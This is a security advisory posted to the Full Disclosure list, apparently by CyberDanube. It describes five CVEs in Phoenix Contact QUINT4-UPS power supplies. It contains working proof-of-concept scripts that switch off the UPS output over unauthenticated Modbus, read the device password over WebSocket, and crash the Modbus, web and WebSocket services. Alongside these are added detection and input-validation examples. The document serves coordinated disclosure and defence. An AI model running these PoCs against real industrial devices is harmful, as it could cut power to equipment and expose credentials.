From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Fri, 17 Oct 2025 16:25:27 +0000
CyberDanube Security Research 20251014-0
-------------------------------------------------------------------------------
              title| Multiple Vulnerabilities
            product| QUINT4-UPS
 vulnerable version| VC:00<VC:07
      fixed version| VC:07 (partially)
         CVE number| CVE-2025-41703, CVE-2025-41704, CVE-2025-41705,
                   | CVE-2025-41706, CVE-2025-41707
             impact| High
           homepage| https://www.phoenixcontact.com/
              found| 16.04.2025
                 by| D. Blagojevic, S. Dietz, F. Koroknai, T. Weber
                   | CyberDanube Security Research
                   | Vienna | St.
                   | This research was conducted in cooperation with VERBUND
                   | OT Cyber Security Lab during a penetration test.
                   |
                   | https://www.cyberdanube.com
                   |
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"What we do
Connecting, distributing, and controlling power and data flows - we have been
developing the right products for this purpose since 1923. Whether in
industrial production facilities, in the field of renewable energies, in
infrastructure, or for complex device connections: our solutions are used
wherever processes must run automatically. Above and beyond their pure
function, they help our partners to develop sustainable applications with more
efficient processes and reduced costs.
We are Phoenix Contact: With innovative products and solutions, we are paving
the way to a climate-neutral and sustainable world."
Source: https://www.phoenixcontact.com/en-us/company
Vulnerable versions
-------------------------------------------------------------------------------
Tested on QUINT4-UPS/24DC/24DC/5/EIP version V2.0.1 / V1.5.1
Affected according to the vendor:
QUINT4-UPS/24DC/24DC/5/EIP VC:00<VC:07
QUINT4-UPS/24DC/24DC/10/EIP VC:00<VC:07
QUINT4-UPS/24DC/24DC/20/EIP VC:00<VC:07
QUINT4-UPS/24DC/24DC/40/EIP VC:00<VC:07
Only affected by CVE-2025-41703 according to the vendor:
QUINT4-UPS/24DC/24DC/5/EIP VC:07
QUINT4-UPS/24DC/24DC/10/EIP VC:07
QUINT4-UPS/24DC/24DC/20/EIP VC:07
QUINT4-UPS/24DC/24DC/40/EIP VC:07
Vendor remediation:
"Starting with version VC:07, all newly shipped devices will include firmware
updates that address four vulnerabilities: CVE-2025-41704, CVE-2025-41705,
CVE-2025-41706, and CVE-2025-41707. However, configuration of devices via
unauthenticated Modbus/TCP remains possible in VC:07, as this protocol is a
widely used standard in the industrial sector. As a result, VC:07 is still
affected by CVE-2025-41703."
Vulnerability overview
-------------------------------------------------------------------------------
1) Manipulation via Modbus (CVE-2025-41703)
The output of the device can be switched off via Modbus/TCP without any
authentication.
2) Denial of Service of Modbus (CVE-2025-41704)
The Modbus service is vulnerable to a denial of service: an unauthenticated
attacker can send a single request after which the device no longer processes
any further Modbus messages.
3) Password Information Leak (CVE-2025-41705)
The device transmits the password over an unauthenticated, unencrypted
WebSocket connection. An unauthenticated attacker who can reach or observe the
connection obtains the credentials.
4) Webserver Denial of Service (CVE-2025-41706)
The webserver is vulnerable to a denial of service condition. A specially
crafted GET request with an over-long Content-Length header triggers the issue.
5) Denial of Service via Websocket (CVE-2025-41707)
The WebSocket handler is vulnerable to a denial of service condition triggered
by a single crafted WebSocket message.
Proof of Concept
-------------------------------------------------------------------------------
1) Manipulation via Modbus (CVE-2025-41703)
The Modbus/TCP configuration interface does not require authentication and
allows the output of the UPS to be switched off. This is done by setting bit 11
(mask 0x0800) of the Code Set Parameters Register (address 0x1040) to 1 with a
Mask Write Register request (function code 0x16), as the following PoC does.
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# <D.Blagojevic>
import sys

from pymodbus import pymodbus_apply_logging_config
from pymodbus.client import ModbusTcpClient

REG: int = 0x1040          # Code Set Parameters Register
DISABLE_OUTPUT: int = 11   # bit that switches the UPS output off


def get_masks(bit: int) -> dict[str, int]:
    # Mask Write Register (FC 0x16) computes (current & and_mask) | (or_mask & ~and_mask),
    # so these two masks set the one bit and leave every other bit untouched.
    mask = (1 << bit) & 0xFFFF
    return {"or_mask": mask, "and_mask": ~mask & 0xFFFF}


def run(ip: str, port: int) -> None:
    pymodbus_apply_logging_config("DEBUG")
    client = ModbusTcpClient(host=ip, port=port)
    client.connect()
    client.mask_write_register(address=REG, **get_masks(DISABLE_OUTPUT))
    client.close()


def main() -> None:
    if 3 < len(sys.argv) or len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} ip [port]", file=sys.stderr)
        sys.exit(1)
    ip: str = sys.argv[1]
    port: int = 502
    if len(sys.argv) == 3:
        port = int(sys.argv[2])
    run(ip, port)


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
2) Denial of Service of Modbus (CVE-2025-41704)
The Modbus service is vulnerable to a denial of service. The PoC sends a Modbus
request with function code 0x08 (Diagnostics) and sub-function 0x0000 (Return
Query Data). After receiving this request, the Modbus service neither processes
nor responds to any further request.
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# <F.Koroknai>
from pymodbus.client import ModbusTcpClient

MODBUS_SERVER_IP = "192.168.19.23"
MODBUS_PORT = 502

client = ModbusTcpClient(MODBUS_SERVER_IP, port=MODBUS_PORT)
if client.connect():
    # FC 0x08 (Diagnostics), sub-function 0x0000 (Return Query Data) with the
    # payload b"Test"; the device stops handling Modbus requests afterwards.
    response = client.diag_query_data(b"Test")
    if response.isError():
        print(f"Request failed: {response}")
    else:
        print(f"No Error: {response}")
    client.close()
else:
    print("Could not connect to Modbus server")
-------------------------------------------------------------------------------
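The two Modbus findings above can also be checked without pymodbus by looking at the frames on the wire. The following is an added example written for this page, not CyberDanube's or Phoenix Contact's code: it builds the Modbus/TCP frames the two PoCs cause pymodbus to emit (FC 0x16 Mask Write Register against register 0x1040 with bit 11 forced on, and FC 0x08 with sub-function 0x0000), shows the register arithmetic a Modbus server performs for a mask write, and runs a small detector over constructed frames that flags both patterns, which is the kind of rule one would deploy on a Modbus-aware sensor in front of the device. The transaction and unit identifiers are arbitrary; the register address and bit number come from the advisory.

```python
"""Modbus/TCP frames for the two Modbus findings, plus a detector for them."""
from __future__ import annotations

import struct
from typing import List, Optional, Tuple

FC_READ_HOLDING = 0x03
FC_DIAGNOSTIC = 0x08
FC_MASK_WRITE = 0x16
SUB_RETURN_QUERY_DATA = 0x0000
CODE_SET_PARAMS_REG = 0x1040      # register named in the advisory
OUTPUT_DISABLE_MASK = 1 << 11     # bit 11 of that register -> 0x0800


def mbap(pdu: bytes, tid: int = 1, unit: int = 1) -> bytes:
    """Prefix a PDU with the MBAP header: tid, protocol 0, length of unit id + PDU, unit id."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def set_bit_masks(bit: int) -> Tuple[int, int]:
    """(and_mask, or_mask) for FC 0x16 that set one bit and keep every other bit."""
    m = (1 << bit) & 0xFFFF
    return ~m & 0xFFFF, m


def mask_write_frame(address: int, and_mask: int, or_mask: int) -> bytes:
    """FC 0x16 Mask Write Register request (what the PoC's mask_write_register call emits)."""
    return mbap(struct.pack(">BHHH", FC_MASK_WRITE, address, and_mask, or_mask))


def diagnostic_frame(sub_function: int, data: bytes) -> bytes:
    """FC 0x08 Diagnostics request: 16-bit sub-function followed by the data bytes."""
    return mbap(struct.pack(">BH", FC_DIAGNOSTIC, sub_function) + data)


def read_holding_frame(address: int, count: int) -> bytes:
    """FC 0x03 Read Holding Registers, used here as a benign frame for contrast."""
    return mbap(struct.pack(">BHH", FC_READ_HOLDING, address, count))


def apply_mask_write(current: int, and_mask: int, or_mask: int) -> int:
    """Register update a Modbus server performs for FC 0x16:
    new = (current AND and_mask) OR (or_mask AND NOT and_mask)."""
    return ((current & and_mask) | (or_mask & ~and_mask)) & 0xFFFF


def inspect_frame(frame: bytes) -> Optional[str]:
    """Return an alert for a frame matching either finding, None otherwise."""
    if len(frame) < 8:
        return None
    _tid, proto, length, _unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        return None                       # not a complete Modbus/TCP frame
    pdu = frame[7:]
    fc = pdu[0]
    if fc == FC_MASK_WRITE and len(pdu) == 7:
        addr, and_mask, or_mask = struct.unpack(">HHH", pdu[1:])
        forced_on = or_mask & ~and_mask & 0xFFFF    # bits the write sets to 1
        if addr == CODE_SET_PARAMS_REG and forced_on & OUTPUT_DISABLE_MASK:
            return f"CVE-2025-41703: FC 0x16 sets output-disable bit of register 0x{addr:04X}"
    if fc == FC_DIAGNOSTIC and len(pdu) >= 3:
        (sub,) = struct.unpack(">H", pdu[1:3])
        if sub == SUB_RETURN_QUERY_DATA:
            return "CVE-2025-41704: FC 0x08 sub-function 0x0000 (Return Query Data)"
    return None


def scan(frames: List[bytes]) -> List[str]:
    """Run the detector over a list of frames and collect the alerts."""
    return [alert for alert in map(inspect_frame, frames) if alert]


# Constructed traffic: one harmless read followed by the two PoC requests.
SAMPLE_FRAMES = [
    read_holding_frame(0x1000, 4),
    mask_write_frame(CODE_SET_PARAMS_REG, *set_bit_masks(11)),
    diagnostic_frame(SUB_RETURN_QUERY_DATA, b"Test"),
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(f.hex(), "->", inspect_frame(f) or "ok")
    print(f"0x1234 after the mask write: 0x{apply_mask_write(0x1234, *set_bit_masks(11)):04X}")
```

The detector deliberately keys on the effective bits (`or_mask & ~and_mask`) rather than on `or_mask` alone, because a mask write only forces a bit to 1 where `and_mask` clears it; a rule that looked at `or_mask` by itself would both miss and over-report.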
3) Password Information Leak (CVE-2025-41705)
The following Python PoC connects to the unauthenticated WebSocket endpoint and
prints the message that contains the password and additional device
information.
-------------------------------------------------------------------------------
#!/bin/env python3
# S. Dietz <fitfrost4>
# pip3 install websocket-client
from websocket import create_connection
import json
import sys

if len(sys.argv) < 2:
    print("usage: ./{} IP".format(sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]
headers = {
    'User-Agent': 'curl/8.5.0',
    'Accept': '*/*',
    'Upgrade': 'websocket',
    'Sec-WebSocket-Protocol': 'quint'
}

# Plain ws:// connection, no authentication: the device sends its
# configuration, including the password, right after the handshake.
ws = create_connection("ws://{}/ws/quint".format(target), header=headers)
ws.recv()          # skip the first message
buf = ws.recv()    # the second message carries the configuration
js = json.loads(buf)
print(json.dumps(js, indent=2))
ws.close()
-------------------------------------------------------------------------------
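The PoC above reads the leaked message through a full WebSocket client; a defender watching the network can recover the same content from the raw frames. The following is an added example for this page, not CyberDanube's or the vendor's code: a minimal RFC 6455 frame encoder and decoder (7-, 16- and 64-bit payload lengths, optional client-side masking) and a scanner that parses each text frame as JSON and reports the paths whose key name, or whose `key` entry, looks like a credential. The sample stream is constructed here; the message shape with `topic`, `data[{key,val}]` and `mid` is taken from the advisory's PoC 5, and the field name `password` is an assumption, since the advisory does not reproduce the real message.

```python
"""RFC 6455 frame handling and a cleartext-credential scanner for WebSocket traffic."""
from __future__ import annotations

import json
import struct
from typing import Iterator, List, Optional, Tuple

OPCODE_TEXT = 0x1
CREDENTIAL_WORDS = ("password", "passwd", "pwd", "secret", "token")


def encode_text_frame(payload: bytes, mask_key: Optional[bytes] = None) -> bytes:
    """Single FIN text frame. Servers send unmasked frames; clients must mask (4-byte key)."""
    mask_bit = 0x80 if mask_key else 0x00
    n = len(payload)
    if n < 126:
        header = bytes([0x80 | OPCODE_TEXT, mask_bit | n])
    elif n < 0x10000:
        header = bytes([0x80 | OPCODE_TEXT, mask_bit | 126]) + struct.pack(">H", n)
    else:
        header = bytes([0x80 | OPCODE_TEXT, mask_bit | 127]) + struct.pack(">Q", n)
    if mask_key:
        masked = bytes(b ^ mask_key[i % 4] for i, b in enumerate(payload))
        return header + mask_key + masked
    return header + payload


def decode_frames(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (opcode, payload) for every complete frame in a reassembled byte stream."""
    i = 0
    while i + 2 <= len(stream):
        b0, b1 = stream[i], stream[i + 1]
        opcode, masked, n = b0 & 0x0F, bool(b1 & 0x80), b1 & 0x7F
        i += 2
        if n == 126:                       # 16-bit extended length
            if i + 2 > len(stream):
                return
            (n,) = struct.unpack(">H", stream[i:i + 2])
            i += 2
        elif n == 127:                     # 64-bit extended length
            if i + 8 > len(stream):
                return
            (n,) = struct.unpack(">Q", stream[i:i + 8])
            i += 8
        key = b""
        if masked:                         # client frames carry a 4-byte masking key
            key = stream[i:i + 4]
            i += 4
        payload = stream[i:i + n]
        i += n
        if len(payload) < n:
            return                         # truncated frame: stop rather than guess
        if masked:
            payload = bytes(b ^ key[j % 4] for j, b in enumerate(payload))
        yield opcode, payload


def credential_paths(node, path: str = "$") -> List[str]:
    """JSON paths whose key name, or whose sibling "key" value, names a credential."""
    hits: List[str] = []
    if isinstance(node, dict):
        for k, v in node.items():
            if any(w in str(k).lower() for w in CREDENTIAL_WORDS):
                hits.append(f"{path}.{k}")
            # key/value records like {"key": "password", "val": "..."} (shape of PoC 5)
            if k == "key" and isinstance(v, str) and any(w in v.lower() for w in CREDENTIAL_WORDS):
                hits.append(f"{path}.val")
            hits.extend(credential_paths(v, f"{path}.{k}"))
    elif isinstance(node, list):
        for idx, item in enumerate(node):
            hits.extend(credential_paths(item, f"{path}[{idx}]"))
    return hits


def scan_ws_stream(stream: bytes) -> List[str]:
    """Decode text frames, parse them as JSON and report where credentials travel in clear."""
    findings: List[str] = []
    for opcode, payload in decode_frames(stream):
        if opcode != OPCODE_TEXT:
            continue
        try:
            doc = json.loads(payload)
        except ValueError:
            continue
        findings.extend(credential_paths(doc))
    return findings


# Constructed server->client stream: a short first message, then a "config" message in
# the topic/data/mid shape of PoC 5. The field name "password" is an assumption.
SAMPLE_STREAM = encode_text_frame(json.dumps({"topic": "hello", "mid": 0}).encode()) + encode_text_frame(
    json.dumps({"topic": "config",
                "data": [{"key": "hostname", "val": "quint4-ups"},
                         {"key": "password", "val": "s3cret"}],
                "mid": 1}).encode())

if __name__ == "__main__":
    for p in scan_ws_stream(SAMPLE_STREAM):
        print("cleartext credential at", p)
```

Run against a pcap, the same logic applies to the reassembled TCP payload after the HTTP 101 response; since the sensitive direction here is server to client, the frames are unmasked and the scanner sees the JSON directly.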
4) Webserver Denial of Service (CVE-2025-41706)
The following GET request with an over-long Content-Length header and a body of
filler bytes crashes the webserver.
-------------------------------------------------------------------------------
GET / HTTP/1.1
Host: 192.168.19.23
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 9005

AAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAA
-------------------------------------------------------------------------------
5) Denial of Service via Websocket (CVE-2025-41707)
The following Python script triggers the denial of service condition of the
device by sending a single "pingpong" message with an over-long key string.
-------------------------------------------------------------------------------
#!/bin/env python3
# S. Dietz <fitfrost4>
# pip3 install websocket-client
from websocket import create_connection
import json
import sys

if len(sys.argv) < 2:
    print("usage: ./{} IP".format(sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]
# Otherwise valid "pingpong" message whose "key" string is 133337 bytes long
payload_dict = {
    "topic": "pingpong",
    "data": [{"key": "A" * 133337, "val": "admin"}],
    "mid": 1
}
payload = json.dumps(payload_dict)
headers = {
    'User-Agent': 'curl/8.5.0',
    'Accept': '*/*',
    'Upgrade': 'websocket',
    'Sec-WebSocket-Protocol': 'quint'
}

ws = create_connection("ws://{}/ws/quint".format(target), header=headers)
ws.send(payload)
ws.close()
-------------------------------------------------------------------------------
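Both web-side findings (4 and 5) are reached with input the server accepts without bounds: a Content-Length far larger than any body the device needs, and a JSON message whose single string is 133337 bytes long. The following added example, written for this page and not taken from the device firmware or from the vendor, shows the checks an embedded HTTP/WebSocket endpoint would apply before allocating or parsing: header and body limits for the request, and size, topic and field-length limits for the WebSocket message. The limits and the topic allowlist are assumptions; the two rejected inputs are constructed to mirror the advisory's PoCs.

```python
"""Bounded parsing for the HTTP request and WebSocket message the two DoS PoCs send."""
from __future__ import annotations

import json
from typing import Callable, Dict, Tuple

# Assumed limits for an embedded web server; the real firmware's values are unknown.
MAX_HEADER_BYTES = 4096
MAX_BODY_BYTES = 2048
MAX_WS_MESSAGE_BYTES = 4096
MAX_WS_KEY_LEN = 64
WS_TOPICS = {"pingpong"}          # only topic visible in the advisory; real set unknown


class RejectedRequest(ValueError):
    """Input violates a bound; a server answers 4xx / closes and never allocates for it."""


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Parse a buffered request, enforcing limits before the body is touched."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep or len(head) > MAX_HEADER_BYTES:
        raise RejectedRequest("header block missing terminator or too large")
    try:
        lines = head.decode("ascii").split("\r\n")
    except UnicodeDecodeError as exc:
        raise RejectedRequest("non-ASCII bytes in header block") from exc
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise RejectedRequest("malformed request line")
    method, target, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name.strip():
            raise RejectedRequest("malformed header line")
        headers[name.strip().lower()] = value.strip()
    declared = headers.get("content-length", "0")
    if not declared.isdigit():
        raise RejectedRequest("non-numeric Content-Length")
    content_length = int(declared)
    if content_length > MAX_BODY_BYTES:            # checked before any body byte is read
        raise RejectedRequest(f"Content-Length {content_length} exceeds {MAX_BODY_BYTES}")
    if method in ("GET", "HEAD") and content_length:
        raise RejectedRequest("request body not allowed on GET/HEAD")
    if len(rest) < content_length:
        raise RejectedRequest("body shorter than Content-Length")
    return method, target, headers, rest[:content_length]


def validate_ws_message(raw: bytes) -> dict:
    """Check a text message's size and shape before any field is used."""
    if len(raw) > MAX_WS_MESSAGE_BYTES:             # checked before json.loads allocates
        raise RejectedRequest(f"WebSocket message of {len(raw)} bytes exceeds {MAX_WS_MESSAGE_BYTES}")
    try:
        msg = json.loads(raw)
    except ValueError as exc:
        raise RejectedRequest("message is not valid JSON") from exc
    if not isinstance(msg, dict) or msg.get("topic") not in WS_TOPICS:
        raise RejectedRequest("unknown or missing topic")
    if not isinstance(msg.get("mid"), int):
        raise RejectedRequest("missing integer message id")
    data = msg.get("data", [])
    if not isinstance(data, list):
        raise RejectedRequest("data must be a list")
    for item in data:
        key = item.get("key") if isinstance(item, dict) else None
        if not isinstance(key, str) or len(key) > MAX_WS_KEY_LEN:
            raise RejectedRequest("data entry lacks a key or key is too long")
    return msg


def check(validator: Callable[[bytes], object], raw: bytes) -> str:
    """Run one validator and summarise the verdict as a string."""
    try:
        validator(raw)
        return "accepted"
    except RejectedRequest as exc:
        return f"rejected: {exc}"


# Constructed inputs mirroring the advisory's PoCs, plus benign counterparts.
POC_HTTP = (b"GET / HTTP/1.1\r\nHost: 192.168.19.23\r\nConnection: keep-alive\r\n"
            b"Content-Length: 9005\r\n\r\n" + b"A" * 9005)
BENIGN_HTTP = b"GET / HTTP/1.1\r\nHost: 192.168.19.23\r\n\r\n"
POC_WS = json.dumps({"topic": "pingpong", "data": [{"key": "A" * 133337, "val": "admin"}],
                     "mid": 1}).encode()
BENIGN_WS = json.dumps({"topic": "pingpong", "data": [{"key": "ping", "val": "1"}],
                        "mid": 1}).encode()

if __name__ == "__main__":
    print("HTTP PoC    :", check(parse_http_request, POC_HTTP))
    print("HTTP benign :", check(parse_http_request, BENIGN_HTTP))
    print("WS PoC      :", check(validate_ws_message, POC_WS))
    print("WS benign   :", check(validate_ws_message, BENIGN_WS))
```

The order of the checks is the point: the declared Content-Length and the raw message size are compared against a limit before anything is copied into a buffer or handed to a parser, so an oversized input costs the server nothing more than reading the header.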
Solution
-------------------------------------------------------------------------------
None.
Workaround
-------------------------------------------------------------------------------
Restrict network access to the device.
Vendor mitigation:
"Affected devices are designed and developed for the use in closed industrial
networks. Phoenix Contact therefore strongly recommends using the devices
exclusively in closed networks and protected by a suitable firewall."
Recommendation
-------------------------------------------------------------------------------
Upgrade to newer hardware (VC:07 or later, which addresses all issues except
CVE-2025-41703).
Contact Timeline
-------------------------------------------------------------------------------
2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publication for 2025-10-14; the shift of the
timeline was confirmed.
2025-09-25: Asked the vendor for another call to clarify details regarding all
affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-10-14: Coordinated publication of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF T.Weber / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/